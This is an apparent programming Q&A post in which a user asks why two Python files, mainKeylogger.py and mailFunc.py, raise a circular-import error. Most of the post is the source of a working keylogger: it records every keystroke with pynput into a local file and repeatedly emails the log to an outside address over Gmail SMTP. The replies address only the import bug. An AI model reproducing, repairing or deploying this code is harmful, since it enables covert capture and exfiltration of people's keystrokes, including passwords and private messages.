# Importing variable in another python files doesn't work(may circular importing error)

Tags: python

I was making some keylogging code for my first security project.

I have 2 python code file named as mainKeylogger.py(capture key log)and mailFunc.py(send mail with keylogging file automatically) under the same directory. When I executed mailFunc.py, there was an error that..

```
AttributeError: partially initialized module 'mainKeylogger' has no attribute 'keylogFileName' (most likely due to a circular import)
```

Do you know why error occurs and how to fix it?
I searched information about "circular import", Maybe it's because I'm not good enough yet about programming, so I didn't understand well.

I need your help.

All the 2 codes I wrote are below.

mainKeylogger.py

```
from pynput.keyboard import Key, Listener
import logging
import logging.handlers
import os
import time
import datetime

import mailFunc

import threading

if os.path.isdir('C:\\Keylogging') == False:
    os.mkdir('C:\\Keylogging')

log_dir = ''

now = datetime.datetime.now()
currentTime = now.strftime('%Y-%m-%d_%H-%M-%S')

logging.basicConfig(filename=(log_dir + "C:\\Keylogging\\"+ currentTime +"Key.txt"),
                    level=logging.DEBUG, format='["%(asctime)s". %(message)s]')

keylogFileName = "C:\\Keylogging\\Key_" + currentTime + ".txt"

def on_press(key):
    logging.info('"{0}"'.format(key))

with Listener(on_press = on_press) as listener:
    listener.join()

mailFunc.autoEmailSend(keylogFileName)
```

mailFunc.py

```
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email import encoders

import os
import time
import schedule

import threading

import mainKeylogger

def autoEmailSend(filenametosend):
        #erased because it is my private information
        email_user = '(erase)'     
        email_password = '(erase)'      
        email_send = '(erase)'         

        subject = 'Keylogging Automatic Report' 

        msg = MIMEMultipart()
        msg['From'] = email_user
        msg['To'] = email_send
        msg['Subject'] = subject

        body = 'Keylogging Report at ' + time.strftime('%c', time.localtime(time.time()))
        msg.attach(MIMEText(body,'plain'))

        filename = filenametosend
        attachment = open(filename,'rb')

        part = MIMEBase('application','octet-stream')
        part.set_payload((attachment).read())
        encoders.encode_base64(part)
        part.add_header('Content-Disposition',"attachment", filename= os.path.basename(filename))
        msg.attach(part)

        text = msg.as_string()
        server = smtplib.SMTP('smtp.gmail.com',587)
        server.starttls()
        server.login(email_user,email_password)

        server.sendmail(email_user,email_send,text)
        server.quit()

        print("Mail Sended at " + time.strftime('%c', time.localtime(time.time())))

        threading.Timer(30.0, autoEmailSend).start()

autoEmailSend(mainKeylogger.keylogFileName)
```

I don't have much experience in this field yet and I'm learning English, so I might not be able to explain the problem well (as English). I ask for your understanding.

Comment: You have two modules that attempt to import each other.  That creates a circular dependency.  You need to remove one of the imports.  The chain of imports must form a cycle-free graph (a directed acyclic graph, or DAG).

Answer (score 1, accepted):

when you import the file, you can use its vars directly

```
 autoEmailSend(keylogFileName)
```